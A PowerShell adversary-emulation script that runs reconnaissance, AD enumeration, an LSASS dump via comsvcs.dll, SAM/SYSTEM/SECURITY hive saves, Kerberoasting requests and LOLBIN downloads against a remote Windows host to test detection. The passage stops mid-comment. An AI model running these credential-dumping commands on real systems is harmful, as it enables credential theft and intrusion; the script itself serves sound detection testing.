sectest.ps1 - only for testing purposes - a Windows living-off-the-land emulation script invoked remotely via PSSession
<#
.SYNOPSIS
Windows Post-Exploitation Security Emulation Script
Based on "Living Off the Land" techniques using only native Windows tools
.DESCRIPTION
This script emulates adversary post-exploitation activities using native Windows
binaries and tools (LOLBINs/LOLBAS). It's designed to run on remote systems via
PowerShell Remoting to test detection and monitoring capabilities.
All phases run inside one PSSession on the target. Results are written as JSON
files (one per phase) plus a timestamped log and a summary into -OutputPath on
the machine running this script, not on the target.
.PARAMETER TargetComputer
The remote computer to run the emulation against (a hostname for WinRM, or the
VM name when -HyperV is used)
.PARAMETER Credential
Credentials to use for remote connection
.PARAMETER OutputPath
Local path where results will be saved (default: C:\SecurityEmulation)
.PARAMETER SkipCredentialHarvesting
Skip credential harvesting operations (LSASS dump, registry extraction).
The Kerberoasting phase is skipped as well when this switch is set.
.PARAMETER SkipLateralMovement
Skip lateral movement testing
.PARAMETER HyperV
Connect over PowerShell Direct (New-PSSession -VMName) instead of WinRM. Use
this when the target is a Hyper-V virtual machine on the local host.
.EXAMPLE
.\sectest.ps1 -TargetComputer "TARGET-PC" -Credential (Get-Credential)
.\sectest.ps1 -TargetComputer "TARGET-PC" -Credential (Get-Credential) -HyperV
.NOTES
WARNING: This script performs activities that security tools may flag as malicious.
Only run this in authorized security testing environments.
The credential harvesting phase asks for interactive confirmation (Read-Host)
before it runs, so the script must be started from an interactive console.
Author: https://github.com/lnfernux @ infernux.no
Version: 1.0
#>
[CmdletBinding()]
param(
    [Parameter(Mandatory=$true)]
    [string]$TargetComputer,
    [Parameter(Mandatory=$true)]
    [PSCredential]$Credential,
    [Parameter(Mandatory=$false)]
    [string]$OutputPath = "C:\SecurityEmulation",
    [Parameter(Mandatory=$false)]
    [switch]$SkipCredentialHarvesting,
    [Parameter(Mandatory=$false)]
    [switch]$SkipLateralMovement,
    # Selects PowerShell Direct (-VMName) instead of WinRM (-ComputerName) in
    # Test-RemoteConnection and when the persistent session is created.
    [Parameter(Mandatory=$false)]
    [switch]$HyperV
)
# Make sure the local results directory exists before the first log line is written.
if ((Test-Path $OutputPath) -eq $false) {
    $null = New-Item -Path $OutputPath -ItemType Directory -Force
}
# A single run timestamp is shared by the log file and every per-phase result
# file so the artefacts of one execution can be correlated afterwards.
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$logFile = Join-Path -Path $OutputPath -ChildPath "emulation_log_$timestamp.txt"
function Write-Log {
    <#
    .SYNOPSIS
    Writes one timestamped, levelled line to the console and appends it to the run log.
    .PARAMETER Message
    Text to log.
    .PARAMETER Level
    Severity tag printed in brackets (the script uses INFO, SUCCESS, WARNING and ERROR).
    Defaults to INFO.
    .NOTES
    Appends to the script-scope $logFile created at the top of the file.
    #>
    param([string]$Message, [string]$Level = "INFO")
    $stamp = Get-Date -Format 'yyyy-MM-dd HH:mm:ss'
    $line = "[$stamp] [$Level] $Message"
    Write-Host $line
    Add-Content -Path $logFile -Value $line
}
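function Test-RemoteConnection {
    <#
    .SYNOPSIS
    Checks that a PSSession can be opened to the target and logs the outcome.
    .DESCRIPTION
    Opens a throw-away session - over PowerShell Direct when the script-level
    -HyperV switch is set, otherwise over WinRM - and closes it again. The
    session is removed in a finally block so it cannot be leaked if something
    fails after it was created.
    .PARAMETER Computer
    Hostname (WinRM) or VM name (Hyper-V) to connect to.
    .PARAMETER Cred
    Credential used for the connection.
    .OUTPUTS
    [bool] $true when the session could be opened, $false otherwise.
    #>
    param([string]$Computer, [PSCredential]$Cred)
    Write-Log "Testing connection to $Computer..."
    # Both transports take the same arguments apart from the target selector,
    # so build the parameter set once instead of duplicating the whole branch.
    $sessionArgs = @{ Credential = $Cred; ErrorAction = 'Stop' }
    if ($HyperV) {
        $sessionArgs['VMName'] = $Computer
    } else {
        $sessionArgs['ComputerName'] = $Computer
    }
    $testSession = $null
    try {
        $testSession = New-PSSession @sessionArgs
        Write-Log "Connection successful" -Level "SUCCESS"
        return $true
    } catch {
        Write-Log "Connection failed: $_" -Level "ERROR"
        return $false
    } finally {
        # Always tear the probe session down, whichever branch returned.
        if ($testSession) {
            Remove-PSSession $testSession -ErrorAction SilentlyContinue
        }
    }
}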
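# ============================================================================
# PHASE 1: INITIAL RECONNAISSANCE AND ENUMERATION
# ============================================================================
function Invoke-InitialReconnaissance {
    <#
    .SYNOPSIS
    Collects host, user, service, network and software inventory from the target.
    .DESCRIPTION
    Runs one script block in the supplied session that gathers the information an
    intruder typically collects first: OS build, domain membership, local users and
    administrators, running processes and SYSTEM services, unquoted service paths,
    IP configuration, established connections, ARP cache, installed software and
    registered antivirus products. Every step is read-only; nothing is written on
    the target. The result is saved locally as 01_reconnaissance_<timestamp>.json
    and returned so the caller can branch on DomainInfo.PartOfDomain.
    .PARAMETER Session
    Open PSSession to the target.
    .OUTPUTS
    Hashtable of the collected sections (deserialised from the remote runspace).
    .NOTES
    Uses the script-scope $OutputPath and $timestamp.
    #>
    param([System.Management.Automation.Runspaces.PSSession]$Session)
    Write-Log "=== PHASE 1: INITIAL RECONNAISSANCE ===" -Level "INFO"
    $results = Invoke-Command -Session $Session -ScriptBlock {
        $output = @{}
        # System Information
        $os = Get-WmiObject -Class Win32_OperatingSystem
        $output['OSInfo'] = $os | Select-Object Caption, Version, BuildNumber, OSArchitecture, LastBootUpTime
        # Check if domain-joined (the caller uses PartOfDomain to decide whether
        # the AD enumeration and Kerberoasting phases run at all)
        $cs = Get-WmiObject -Class Win32_ComputerSystem
        $output['DomainInfo'] = @{
            PartOfDomain = $cs.PartOfDomain
            Domain = $cs.Domain
            Name = $cs.Name
        }
        # Current user privileges
        $output['UserInfo'] = whoami /all
        # Local users
        $output['LocalUsers'] = Get-LocalUser | Select-Object Name, Enabled, LastLogon, PasswordLastSet
        # Local administrators
        $output['LocalAdmins'] = Get-LocalGroupMember -Group "Administrators" -ErrorAction SilentlyContinue
        # Running processes: the first 50 as Get-Process returns them, then sorted by name
        $output['Processes'] = Get-Process | Select-Object ProcessName, Id, Path -First 50 | Sort-Object ProcessName
        # Services running as SYSTEM
        $output['SystemServices'] = Get-WmiObject win32_service |
            Where-Object {$_.StartName -eq "LocalSystem" -and $_.State -eq "Running"} |
            Select-Object Name, PathName, State -First 20
        # Unquoted service paths: an unquoted binary path that contains spaces is a
        # misconfiguration worth remediating (quote the ImagePath).
        $output['UnquotedServices'] = Get-WmiObject win32_service | Where-Object {
            $_.PathName -notlike '"*' -and $_.PathName -like '* *'
        } | Select-Object Name, PathName, StartName, State
        # Network configuration
        $output['NetworkConfig'] = Get-NetIPConfiguration | Select-Object InterfaceAlias, IPv4Address, IPv4DefaultGateway, DNSServer
        # Established connections
        $output['Connections'] = Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} |
            Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort -First 20
        # ARP cache
        $output['ARPCache'] = Get-NetNeighbor | Where-Object {$_.State -ne "Unreachable" -and $_.State -ne "Incomplete"} |
            Select-Object IPAddress, State -First 20
        # Installed software (64-bit). Drop entries without a DisplayName *before*
        # truncating - filtering after -First 30 left the list mostly empty because
        # many Uninstall subkeys carry no DisplayName.
        $output['InstalledSoftware'] = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |
            Where-Object {$_.DisplayName -ne $null} |
            Select-Object DisplayName, DisplayVersion, Publisher -First 30
        # Security products registered with Security Center (the namespace is not
        # present on every SKU, hence SilentlyContinue)
        $output['SecurityProducts'] = Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct -ErrorAction SilentlyContinue |
            Select-Object displayName, pathToSignedProductExe, productState
        return $output
    }
    # Save results
    $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "01_reconnaissance_$timestamp.json")
    Write-Log "Reconnaissance complete. Results saved."
    return $results
}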
# ============================================================================
# PHASE 2: ACTIVE DIRECTORY ENUMERATION
# ============================================================================
function Invoke-ADEnumeration {
    <#
    .SYNOPSIS
    Enumerates domain information from the target using .NET, ADSI and native tools.
    .DESCRIPTION
    Only meaningful on a domain-joined target; otherwise the remote block returns
    @{Error=...} immediately. Collects domain/forest/DC names, nltest and net group
    listings, and three LDAP reads: user accounts with an SPN (Kerberoasting
    candidates), accounts whose password never expires, and computer objects. All
    of it is read-only; nothing in the directory is changed. Results are saved
    locally as 02_ad_enumeration_<timestamp>.json and returned.
    .PARAMETER Session
    Open PSSession to the target.
    .NOTES
    Uses the script-scope $OutputPath and $timestamp.
    #>
    param([System.Management.Automation.Runspaces.PSSession]$Session)
    Write-Log "=== PHASE 2: ACTIVE DIRECTORY ENUMERATION ===" -Level "INFO"
    $results = Invoke-Command -Session $Session -ScriptBlock {
        $output = @{}
        # Check if domain-joined first
        $cs = Get-WmiObject -Class Win32_ComputerSystem
        if (-not $cs.PartOfDomain) {
            return @{Error = "System is not domain-joined"}
        }
        # Domain information using .NET
        try {
            $domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
            $output['DomainInfo'] = @{
                Name = $domain.Name
                Forest = $domain.Forest.Name
                DomainControllers = $domain.DomainControllers | ForEach-Object { $_.Name }
            }
        } catch {
            $output['DomainInfoError'] = $_.Exception.Message
        }
        # Native tools enumeration
        # nltest - Domain controllers and trusts
        # (2>&1 merges stderr into the captured value so failures are recorded as well)
        $output['nltest_dclist'] = nltest /dclist:$env:USERDNSDOMAIN 2>&1
        $output['nltest_trusts'] = nltest /domain_trusts 2>&1
        # net commands
        $output['net_domainadmins'] = net group "Domain Admins" /domain 2>&1
        $output['net_domaincontrollers'] = net group "Domain Controllers" /domain 2>&1
        $output['net_passwordpolicy'] = net accounts /domain 2>&1
        # ADSI queries for users with SPNs (Kerberoasting targets)
        # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule and 512 is the
        # NORMAL_ACCOUNT flag, so this selects user (not computer) accounts with an SPN.
        try {
            $searcher = [ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))"
            $searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname","pwdlastset"))
            $searcher.PageSize = 100   # paged search, so the full result set is returned on large domains
            $spnUsers = $searcher.FindAll() | ForEach-Object {
                @{
                    Username = $_.Properties['samaccountname'][0]
                    SPN = $_.Properties['serviceprincipalname'][0]   # first SPN only; an account may hold several
                    PasswordLastSet = if ($_.Properties['pwdlastset'].Count -gt 0) {
                        [DateTime]::FromFileTime($_.Properties['pwdlastset'][0])
                    } else { $null }
                }
            }
            $output['KerberoastableAccounts'] = $spnUsers
        } catch {
            $output['KerberoastError'] = $_.Exception.Message
        }
        # setspn enumeration (output capped at 50 lines)
        $output['setspn_all'] = setspn -Q */* 2>&1 | Select-Object -First 50
        # Users with passwords never expire (UAC bit 65536 = DONT_EXPIRE_PASSWORD)
        try {
            $searcher = [ADSISearcher]"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"
            $searcher.PageSize = 100
            $neverExpire = $searcher.FindAll() | ForEach-Object {
                $_.Properties['samaccountname'][0]
            }
            $output['PasswordNeverExpire'] = $neverExpire
        } catch {
            $output['PasswordNeverExpireError'] = $_.Exception.Message
        }
        # Find domain computers (first 50 only)
        try {
            $searcher = [ADSISearcher]"(objectClass=computer)"
            $searcher.PropertiesToLoad.AddRange(@("name","operatingsystem"))
            $searcher.PageSize = 100
            $computers = $searcher.FindAll() | ForEach-Object {
                @{
                    Name = $_.Properties['name'][0]
                    OS = if ($_.Properties['operatingsystem'].Count -gt 0) {
                        $_.Properties['operatingsystem'][0]
                    } else { "Unknown" }
                }
            } | Select-Object -First 50
            $output['DomainComputers'] = $computers
        } catch {
            $output['DomainComputersError'] = $_.Exception.Message
        }
        # dsquery if available (usually only present where the AD DS tools are installed)
        $dsqueryAvailable = Get-Command dsquery -ErrorAction SilentlyContinue
        if ($dsqueryAvailable) {
            # NOTE(review): the 2>&1 applies to dsget only; dsquery's own errors are not captured
            $output['dsquery_domainadmins'] = dsquery group -name "Domain Admins" | dsget group -members 2>&1
        }
        return $output
    }
    # Save results
    $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "02_ad_enumeration_$timestamp.json")
    Write-Log "Active Directory enumeration complete. Results saved."
    return $results
}
# ============================================================================
# PHASE 3: CREDENTIAL HARVESTING
# ============================================================================
function Invoke-CredentialHarvesting {
    <#
    .SYNOPSIS
    Emulates credential-access activity on the target so the resulting telemetry
    can be checked against detection rules.
    .DESCRIPTION
    With local administrator rights the remote block dumps LSASS through
    rundll32/comsvcs.dll and saves the SAM, SYSTEM and SECURITY hives with reg.exe;
    each artefact is written to C:\Windows\Temp on the target and deleted straight
    away. Without admin rights only the non-privileged checks run: a grep of the
    PSReadLine history, a search for well-known credential files, cmdkey /list and
    klist. Results are saved locally as 03_credential_harvesting_<timestamp>.json
    and returned.
    Handling note: the PowerShellHistory.Samples, CredentialManager and
    KerberosTickets sections store command output verbatim, so the JSON file in
    $OutputPath can itself contain secrets - restrict access to that directory and
    delete the results once the detection review is done.
    .PARAMETER Session
    Open PSSession to the target.
    .NOTES
    Uses the script-scope $OutputPath and $timestamp. The caller asks for
    interactive confirmation before invoking this function.
    #>
    param([System.Management.Automation.Runspaces.PSSession]$Session)
    Write-Log "=== PHASE 3: CREDENTIAL HARVESTING ===" -Level "WARNING"
    Write-Log "WARNING: This phase performs sensitive operations that will trigger security alerts!"
    $results = Invoke-Command -Session $Session -ScriptBlock {
        $output = @{}
        $tempPath = "C:\Windows\Temp"
        # Check privileges
        $isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        $output['IsAdmin'] = $isAdmin
        if ($isAdmin) {
            # LSASS Memory Dump using comsvcs.dll
            try {
                $lsassPid = (Get-Process lsass).Id
                $dumpPath = "$tempPath\lsass_$((Get-Date).Ticks).dmp"
                $output['LSASS_DumpAttempt'] = @{
                    PID = $lsassPid
                    DumpPath = $dumpPath
                    Timestamp = Get-Date
                }
                # This is the actual LSASS dump - HIGHLY DETECTABLE
                # Expect alerts on the rundll32 -> comsvcs.dll MiniDump call, on the
                # LSASS process access, and on the .dmp file creation. $result is never
                # read; success is judged purely by whether the dump file exists.
                $result = rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid $dumpPath full 2>&1
                if (Test-Path $dumpPath) {
                    $output['LSASS_DumpSuccess'] = $true
                    $output['LSASS_DumpSize'] = (Get-Item $dumpPath).Length
                    # Clean up immediately. If the run is interrupted between the dump
                    # and this line the file stays in C:\Windows\Temp on the target -
                    # check for leftovers after any aborted run.
                    Remove-Item $dumpPath -Force -ErrorAction SilentlyContinue
                    $output['LSASS_DumpCleaned'] = $true
                } else {
                    $output['LSASS_DumpSuccess'] = $false
                }
            } catch {
                $output['LSASS_DumpError'] = $_.Exception.Message
            }
            # Registry Hive Extraction
            # Three separate reg.exe save operations; RegistryHives records whether
            # each output file appeared. The hive files are removed right after.
            try {
                $samPath = "$tempPath\sam_$((Get-Date).Ticks).hive"
                $systemPath = "$tempPath\system_$((Get-Date).Ticks).hive"
                $securityPath = "$tempPath\security_$((Get-Date).Ticks).hive"
                reg save HKLM\SAM $samPath /y 2>&1 | Out-Null
                reg save HKLM\SYSTEM $systemPath /y 2>&1 | Out-Null
                reg save HKLM\SECURITY $securityPath /y 2>&1 | Out-Null
                $output['RegistryHives'] = @{
                    SAM = Test-Path $samPath
                    SYSTEM = Test-Path $systemPath
                    SECURITY = Test-Path $securityPath
                }
                # Clean up (same caveat as above: an aborted run can leave these behind)
                Remove-Item $samPath -Force -ErrorAction SilentlyContinue
                Remove-Item $systemPath -Force -ErrorAction SilentlyContinue
                Remove-Item $securityPath -Force -ErrorAction SilentlyContinue
            } catch {
                $output['RegistryHivesError'] = $_.Exception.Message
            }
        } else {
            $output['AdminRequiredWarning'] = "Administrator privileges required for credential harvesting"
        }
        # PowerShell History Mining (works without admin)
        # NOTE(review): Get-PSReadlineOption may not be available inside a remoting
        # session; if it throws, the catch below records that instead of a result.
        try {
            $historyPath = (Get-PSReadlineOption).HistorySavePath
            if (Test-Path $historyPath) {
                $history = Get-Content $historyPath | Select-String -Pattern "password|credential|secret|api" -CaseSensitive:$false
                $output['PowerShellHistory'] = @{
                    HistoryPath = $historyPath
                    SuspiciousEntries = $history.Count
                    # Samples holds the matching history lines verbatim - this is what
                    # makes the results file sensitive.
                    Samples = $history | Select-Object -First 5
                }
            }
        } catch {
            $output['PowerShellHistoryError'] = $_.Exception.Message
        }
        # Search for credential files (only names and sizes are recorded, not contents)
        try {
            $credFiles = @()
            # Unattended install files
            $credFiles += Get-ChildItem C:\Windows\Panther\ -Recurse -Include unattend.xml,autounattend.xml -ErrorAction SilentlyContinue |
                Select-Object FullName, Length
            # VNC files
            $credFiles += Get-ChildItem C:\ -Recurse -Include ultravnc.ini,vnc.ini -ErrorAction SilentlyContinue -Depth 3 |
                Select-Object FullName, Length
            # FileZilla
            $credFiles += Get-ChildItem C:\Users\*\AppData\Roaming\FileZilla\ -Include sitemanager.xml,recentservers.xml -ErrorAction SilentlyContinue |
                Select-Object FullName, Length
            $output['CredentialFiles'] = $credFiles
        } catch {
            $output['CredentialFilesError'] = $_.Exception.Message
        }
        # Credential Manager
        try {
            $output['CredentialManager'] = cmdkey /list 2>&1
        } catch {
            $output['CredentialManagerError'] = $_.Exception.Message
        }
        # Kerberos tickets
        try {
            $output['KerberosTickets'] = klist 2>&1
        } catch {
            $output['KerberosTicketsError'] = $_.Exception.Message
        }
        return $output
    }
    # Save results
    $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "03_credential_harvesting_$timestamp.json")
    Write-Log "Credential harvesting complete. Results saved."
    return $results
}
# ============================================================================
# PHASE 4: KERBEROASTING EMULATION
# ============================================================================
function Invoke-Kerberoasting {
    <#
    .SYNOPSIS
    Requests a service ticket for every SPN-bearing user account so the resulting
    TGS requests can be matched against detection rules.
    .DESCRIPTION
    Finds user accounts with a servicePrincipalName via ADSI, then asks the KDC for
    a service ticket for the first SPN of each one through
    System.IdentityModel.Tokens.KerberosRequestorSecurityToken. Only the request
    is made: the token object is discarded and no ticket material is written to the
    results, which record username, SPN, success flag and timestamp. The tickets
    do land in the local ticket cache, which is why klist output is captured
    afterwards. Results are saved locally as 04_kerberoasting_<timestamp>.json
    and returned.
    .PARAMETER Session
    Open PSSession to the target.
    .NOTES
    Uses the script-scope $OutputPath and $timestamp. The caller runs this phase
    only on domain-joined targets and only when -SkipCredentialHarvesting is not set.
    #>
    param([System.Management.Automation.Runspaces.PSSession]$Session)
    Write-Log "=== PHASE 4: KERBEROASTING EMULATION ===" -Level "INFO"
    $results = Invoke-Command -Session $Session -ScriptBlock {
        $output = @{}
        # Find accounts with SPNs (same filter as Phase 2: user accounts with any SPN)
        # NOTE(review): no PageSize is set here, unlike Phase 2, so the server-side
        # size limit may cap the result on large domains - confirm if counts differ.
        try {
            $searcher = [ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))"
            $searcher.PropertiesToLoad.AddRange(@("samaccountname","serviceprincipalname"))
            $spnAccounts = $searcher.FindAll()
            if ($spnAccounts.Count -gt 0) {
                # Loads the .NET assembly that provides KerberosRequestorSecurityToken
                Add-Type -AssemblyName System.IdentityModel
                $tickets = @()
                foreach ($account in $spnAccounts) {
                    $spn = $account.Properties['serviceprincipalname'][0]
                    $username = $account.Properties['samaccountname'][0]
                    try {
                        # Request TGS ticket. $ticket is intentionally never read; the
                        # request itself is the emulated behaviour.
                        $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
                        $tickets += @{
                            Username = $username
                            SPN = $spn
                            TicketRequested = $true
                            Timestamp = Get-Date
                        }
                    } catch {
                        $tickets += @{
                            Username = $username
                            SPN = $spn
                            TicketRequested = $false
                            Error = $_.Exception.Message
                        }
                    }
                }
                $output['RequestedTickets'] = $tickets
                # List cached tickets (the requested service tickets should now appear here)
                $output['CachedTickets'] = klist 2>&1
            } else {
                $output['Message'] = "No Kerberoastable accounts found"
            }
        } catch {
            $output['Error'] = $_.Exception.Message
        }
        return $output
    }
    # Save results
    $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "04_kerberoasting_$timestamp.json")
    Write-Log "Kerberoasting emulation complete. Results saved."
    return $results
}
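# ============================================================================
# PHASE 5: LATERAL MOVEMENT TESTING
# ============================================================================
function Invoke-LateralMovementTest {
    <#
    .SYNOPSIS
    Probes WinRM and WMI reachability of the target's IPv4 ARP neighbours.
    .DESCRIPTION
    From the target, picks up to five "Reachable" IPv4 ARP-cache entries and
    checks each one with Test-WSMan and a remote Win32_OperatingSystem query.
    This is a connectivity check only: nothing is executed on the neighbours and
    no explicit credential is supplied, so the WMI query runs as the session
    identity. Results are saved locally as 05_lateral_movement_<timestamp>.json
    and returned.
    .PARAMETER Session
    Open PSSession to the target.
    .PARAMETER Cred
    Accepted for interface compatibility with the caller but not used by the
    remote block; the probes deliberately run without a separate credential.
    .NOTES
    Uses the script-scope $OutputPath and $timestamp. NOTE(review): the remote
    WMI call originates inside a PSSession, so it may fail with access denied
    where delegation (second hop) is not configured - a WMIAvailable=$false
    result does not necessarily mean the neighbour refuses WMI.
    #>
    param(
        [System.Management.Automation.Runspaces.PSSession]$Session,
        [PSCredential]$Cred
    )
    Write-Log "=== PHASE 5: LATERAL MOVEMENT TESTING ===" -Level "INFO"
    $results = Invoke-Command -Session $Session -ScriptBlock {
        $output = @{}
        # Get list of potential targets from ARP cache
        $targets = Get-NetNeighbor | Where-Object {
            $_.State -eq "Reachable" -and $_.AddressFamily -eq "IPv4"
        } | Select-Object -First 5 -ExpandProperty IPAddress
        $output['PotentialTargets'] = $targets
        # Test WinRM connectivity to targets
        $winrmTests = @()
        foreach ($target in $targets) {
            try {
                # Only the success/failure matters; the identity response is discarded.
                $null = Test-WSMan -ComputerName $target -ErrorAction Stop
                $winrmTests += @{
                    Target = $target
                    WinRMAvailable = $true
                }
            } catch {
                $winrmTests += @{
                    Target = $target
                    WinRMAvailable = $false
                }
            }
        }
        $output['WinRMTests'] = $winrmTests
        # WMI connectivity tests
        $wmiTests = @()
        foreach ($target in $targets) {
            try {
                $os = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $target -ErrorAction Stop
                $wmiTests += @{
                    Target = $target
                    WMIAvailable = $true
                    OS = $os.Caption
                }
            } catch {
                $wmiTests += @{
                    Target = $target
                    WMIAvailable = $false
                }
            }
        }
        $output['WMITests'] = $wmiTests
        return $output
    }
    # Save results
    $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "05_lateral_movement_$timestamp.json")
    Write-Log "Lateral movement testing complete. Results saved."
    return $results
}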
# ============================================================================
# PHASE 6: LOLBIN/LOLBAS TECHNIQUES
# ============================================================================
function Invoke-LOLBINTechniques {
    <#
    .SYNOPSIS
    Exercises common living-off-the-land binaries on the target and records their output.
    .DESCRIPTION
    Two outbound download attempts (certutil and bitsadmin fetching a public
    robots.txt into C:\Windows\Temp, deleted afterwards) followed by read-only
    enumeration with wmic, sc, reg query, schtasks, tasklist, netstat, ipconfig,
    arp, route and systeminfo. Most outputs are truncated with Select-Object -First.
    The download Success flags depend on the target having outbound HTTP access.
    Results are saved locally as 06_lolbin_techniques_<timestamp>.json and returned.
    .PARAMETER Session
    Open PSSession to the target.
    .NOTES
    Uses the script-scope $OutputPath and $timestamp. The try/catch blocks around
    native commands only catch PowerShell-level errors (e.g. the command is not
    present); a non-zero exit code from the tool itself does not throw, so failures
    show up as error text in the captured output instead.
    #>
    param([System.Management.Automation.Runspaces.PSSession]$Session)
    Write-Log "=== PHASE 6: LOLBIN/LOLBAS TECHNIQUES ===" -Level "INFO"
    $results = Invoke-Command -Session $Session -ScriptBlock {
        $output = @{}
        $tempPath = "C:\Windows\Temp"
        # certutil - File download simulation
        # NOTE(review): -urlcache reportedly keeps a copy in certutil's own URL cache;
        # the Remove-Item below only deletes the target file - verify cleanup if a
        # clean post-test state matters.
        try {
            $testUrl = "http://www.google.com/robots.txt"
            $testFile = "$tempPath\certutil_test_$((Get-Date).Ticks).txt"
            certutil -urlcache -split -f $testUrl $testFile 2>&1 | Out-Null
            $output['certutil_download'] = @{
                Success = Test-Path $testFile
                TestFile = $testFile
            }
            Remove-Item $testFile -Force -ErrorAction SilentlyContinue
        } catch {
            $output['certutil_error'] = $_.Exception.Message
        }
        # bitsadmin - File download simulation (same URL, via a BITS job named "testjob")
        try {
            $testUrl = "http://www.google.com/robots.txt"
            $testFile = "$tempPath\bitsadmin_test_$((Get-Date).Ticks).txt"
            bitsadmin /transfer testjob /download /priority high $testUrl $testFile 2>&1 | Out-Null
            $output['bitsadmin_download'] = @{
                Success = Test-Path $testFile
                TestFile = $testFile
            }
            Remove-Item $testFile -Force -ErrorAction SilentlyContinue
        } catch {
            $output['bitsadmin_error'] = $_.Exception.Message
        }
        # wmic - Process enumeration (wmic is deprecated on current Windows builds;
        # if it is absent the catch records the error)
        try {
            $output['wmic_processes'] = wmic process get name,processid,commandline 2>&1 | Select-Object -First 20
        } catch {
            $output['wmic_error'] = $_.Exception.Message
        }
        # sc - Service enumeration
        try {
            $output['sc_query'] = sc query 2>&1 | Select-Object -First 30
        } catch {
            $output['sc_error'] = $_.Exception.Message
        }
        # reg query - Registry enumeration (autostart locations)
        try {
            $output['reg_run_keys'] = reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>&1
            $output['reg_runonce_keys'] = reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>&1
        } catch {
            $output['reg_error'] = $_.Exception.Message
        }
        # schtasks - Scheduled tasks enumeration
        try {
            $output['schtasks'] = schtasks /query /fo LIST /v 2>&1 | Select-Object -First 50
        } catch {
            $output['schtasks_error'] = $_.Exception.Message
        }
        # tasklist - Process listing
        try {
            $output['tasklist'] = tasklist /v 2>&1 | Select-Object -First 30
        } catch {
            $output['tasklist_error'] = $_.Exception.Message
        }
        # netstat - Network connections
        try {
            $output['netstat'] = netstat -ano 2>&1 | Select-Object -First 30
        } catch {
            $output['netstat_error'] = $_.Exception.Message
        }
        # ipconfig - Network configuration
        try {
            $output['ipconfig'] = ipconfig /all 2>&1
        } catch {
            $output['ipconfig_error'] = $_.Exception.Message
        }
        # arp - ARP table
        try {
            $output['arp_table'] = arp -a 2>&1
        } catch {
            $output['arp_error'] = $_.Exception.Message
        }
        # route - Routing table
        try {
            $output['route_print'] = route print 2>&1
        } catch {
            $output['route_error'] = $_.Exception.Message
        }
        # systeminfo - System information (full output, not truncated)
        try {
            $output['systeminfo'] = systeminfo 2>&1
        } catch {
            $output['systeminfo_error'] = $_.Exception.Message
        }
        return $output
    }
    # Save results
    $results | ConvertTo-Json -Depth 5 | Out-File (Join-Path $OutputPath "06_lolbin_techniques_$timestamp.json")
    Write-Log "LOLBIN/LOLBAS techniques complete. Results saved."
    return $results
}
# ============================================================================
# MAIN EXECUTION
# ============================================================================
# Run banner
Write-Log "========================================"
Write-Log "Windows Security Emulation Script"
Write-Log "Target: $TargetComputer"
Write-Log "Output: $OutputPath"
Write-Log "========================================"
# Probe connectivity with a throw-away session before any phase starts, so
# credential or transport problems are reported up front.
$reachable = Test-RemoteConnection -Computer $TargetComputer -Cred $Credential
if (-not $reachable) {
    Write-Log "Cannot establish connection to target. Exiting." -Level "ERROR"
    exit 1
}
# Create the persistent session every phase will reuse. Transport selection
# mirrors Test-RemoteConnection: PowerShell Direct for -HyperV, WinRM otherwise.
Write-Log "Creating persistent PSSession..."
$sessionArgs = @{ Credential = $Credential; ErrorAction = 'Stop' }
if ($HyperV) {
    $sessionArgs['VMName'] = $TargetComputer
} else {
    $sessionArgs['ComputerName'] = $TargetComputer
}
try {
    $session = New-PSSession @sessionArgs
    Write-Log "Session established successfully"
} catch {
    Write-Log "Failed to create PSSession: $_" -Level "ERROR"
    exit 1
}
try {
    # Phase 1 always runs; its DomainInfo decides whether the AD phases make sense.
    $reconResults = Invoke-InitialReconnaissance -Session $session
    $isDomainJoined = $reconResults.DomainInfo.PartOfDomain
    # Phase 2: AD Enumeration
    if ($isDomainJoined) {
        $adResults = Invoke-ADEnumeration -Session $session
    } else {
        Write-Log "Target is not domain-joined. Skipping AD enumeration."
    }
    # Phase 3: Credential Harvesting - interactive confirmation is required because
    # this phase writes dump/hive files on the target and will raise alerts.
    if (-not $SkipCredentialHarvesting) {
        Write-Host "`nWARNING: About to perform credential harvesting operations." -ForegroundColor Yellow
        Write-Host "These operations are HIGHLY DETECTABLE and may trigger security alerts." -ForegroundColor Yellow
        $confirm = Read-Host "Continue? (yes/no)"
        switch ($confirm) {
            "yes" { $credResults = Invoke-CredentialHarvesting -Session $session }
            default { Write-Log "Credential harvesting skipped by user" }
        }
    }
    # Phase 4: Kerberoasting (domain-joined targets only, and tied to the
    # credential-harvesting switch)
    if ($isDomainJoined -and -not $SkipCredentialHarvesting) {
        $kerbResults = Invoke-Kerberoasting -Session $session
    }
    # Phase 5: Lateral Movement
    if (-not $SkipLateralMovement) {
        $lateralResults = Invoke-LateralMovementTest -Session $session -Cred $Credential
    }
    # Phase 6: LOLBIN Techniques
    $lolbinResults = Invoke-LOLBINTechniques -Session $session
    Write-Log "========================================"
    Write-Log "Security emulation complete!"
    Write-Log "Results saved to: $OutputPath"
    Write-Log "========================================"
} catch {
    Write-Log "Error during execution: $_" -Level "ERROR"
} finally {
    # Always close the persistent session, whether the phases finished or not.
    if ($session) {
        Remove-PSSession $session
        Write-Log "PSSession closed"
    }
}
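# Generate summary report.
# A phase is marked [X] only when its result variable was actually assigned by
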